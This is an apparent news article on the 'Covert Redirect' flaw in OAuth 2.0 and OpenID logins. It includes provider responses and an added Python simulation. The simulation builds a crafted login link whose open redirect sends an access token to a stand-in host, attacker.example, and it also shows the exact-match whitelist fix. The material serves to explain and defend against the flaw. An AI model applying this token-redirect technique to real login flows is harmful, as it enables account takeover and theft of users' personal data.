Following in the wake of the Heartbleed security flaw, a new weakness has been reported in the OAuth 2.0 and OpenID login protocols. Many popular websites, including Google, Microsoft, Facebook and LinkedIn, use these protocols to let users sign in to third-party apps with an existing account. The issue has been dubbed "Covert Redirect": the user sees a genuine login and authorization popup on the affected provider's real domain, but the result of that login is quietly forwarded somewhere else.
Covert Redirect is built on an already well-known class of bug, the open redirect, combined with a redirect parameter that the identity provider does not check strictly enough. In practice it looks like this: a user clicks a malicious link on a website or in an e-mail and gets a real Facebook popup asking them to authorize an app. Rather than using a look-alike domain, the attack uses the actual domains of the provider and of the legitimate app, because the only thing the attacker controls is where the app's own redirect sends the browser afterwards.
If the user does authorize the app, the access token or authorization code that the provider hands back is sent on to the attacker's site instead of staying with the legitimate app. What the attacker then holds is whatever the user granted, ranging from control of the account to personal information such as e-mail and postal addresses.
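The following is an added illustration, not code from the original report or from any of the providers named here. It simulates the flow described above in miniature: a provider that only checks the redirect host (a permissive check assumed here for illustration), a legitimate app that happens to host an open redirector, and an attacker who points the login's redirect at that redirector. The hostnames, paths and token value are constructed, and the provider is modelled as returning the token in the URL fragment (the implicit grant), which browsers preserve across the app's redirect so it lands on the attacker's page. The same code shows the exact-match whitelist check that closes the hole.

```python
from urllib.parse import urlsplit, parse_qs, urlencode

# Constructed example: the legitimate app registered this callback with the provider.
REGISTERED_REDIRECT = "https://app.example/oauth/callback"
# Constructed attacker endpoint that will receive the leaked token.
ATTACKER_SINK = "https://attacker.example/steal"


def loose_redirect_ok(redirect_uri: str) -> bool:
    """Permissive check (assumption for illustration): accept any path on the
    registered scheme+host. This is the kind of check Covert Redirect abuses."""
    reg, cand = urlsplit(REGISTERED_REDIRECT), urlsplit(redirect_uri)
    return cand.scheme == reg.scheme and cand.netloc == reg.netloc


def strict_redirect_ok(redirect_uri: str) -> bool:
    """Exact match against the pre-registered URI: the whitelist fix."""
    return redirect_uri == REGISTERED_REDIRECT


def provider_authorize(redirect_uri: str, validator, token: str = "tok_constructed_123"):
    """Simulated identity provider. After the user clicks Allow, the token is
    appended to redirect_uri as a fragment. Returns None if the URI is rejected."""
    if not validator(redirect_uri):
        return None
    return redirect_uri + "#access_token=" + token


def app_open_redirector(url: str) -> str:
    """Simulated open redirector on the legitimate app's own domain:
    /redirect?next=<anything> answers with a 302 to <anything>. Browsers keep the
    original fragment when the Location header carries none, so the token follows."""
    parts = urlsplit(url)
    if parts.path != "/redirect":
        return url  # any other page is served normally
    nxt = parse_qs(parts.query).get("next", [None])[0]
    if nxt is None:
        return url
    return nxt + ("#" + parts.fragment if parts.fragment else "")


def run_attack(validator):
    """Attacker-crafted login link: redirect_uri is on the real app domain but
    points at its redirector, with next= set to the attacker's sink.
    Returns (final_host, final_fragment) or None if the provider refused."""
    malicious_redirect = "https://app.example/redirect?" + urlencode({"next": ATTACKER_SINK})
    response = provider_authorize(malicious_redirect, validator)
    if response is None:
        return None
    final = app_open_redirector(response)
    return urlsplit(final).netloc, urlsplit(final).fragment


def run_legit_login(validator):
    """Normal login for comparison: the token stays on the app's callback."""
    response = provider_authorize(REGISTERED_REDIRECT, validator)
    if response is None:
        return None
    final = app_open_redirector(response)
    return urlsplit(final).netloc, urlsplit(final).fragment


if __name__ == "__main__":
    print("loose check, attack :", run_attack(loose_redirect_ok))
    print("strict check, attack:", run_attack(strict_redirect_ok))
    print("strict check, legit :", run_legit_login(strict_redirect_ok))
```

With the loose check the token ends up in the fragment of a page on attacker.example; with the exact-match check the provider refuses the crafted redirect before the popup is ever shown, while the normal login still works. Note that the strict check has to be enforced per registered app, which is why a provider cannot flip it on for everyone at once without breaking apps that rely on looser matching.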
When the issue was reported to Facebook, the company responded that it "understood the risks associated with OAuth 2.0," and that "short of forcing every single application on the platform to use a whitelist," fixing the flaw was "something that can't be accomplished in the short term."
Interesting words from such a huge internet presence as Facebook. The flaw was also reported to Google, LinkedIn and Microsoft, which gave varying answers on how they would respond. Google said the problem was being tracked, and LinkedIn said it had published a blog post on the hole.
PayPal also responded to the flaw, in a statement:
“When PayPal implemented OAuth2.0/OpenID, we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability,” James Barrese, PayPal’s CTO, said.
All in all, although the issue is not as pressing or severe as Heartbleed, it is still a large hole that needs closing, and the inability to do so quickly is frustrating, even if the reason is structural: a provider can only shut it by requiring every third-party app to register exact redirect URLs (the whitelist Facebook refers to) or by each of those apps fixing its own open redirects, and neither can be imposed on thousands of independent developers overnight.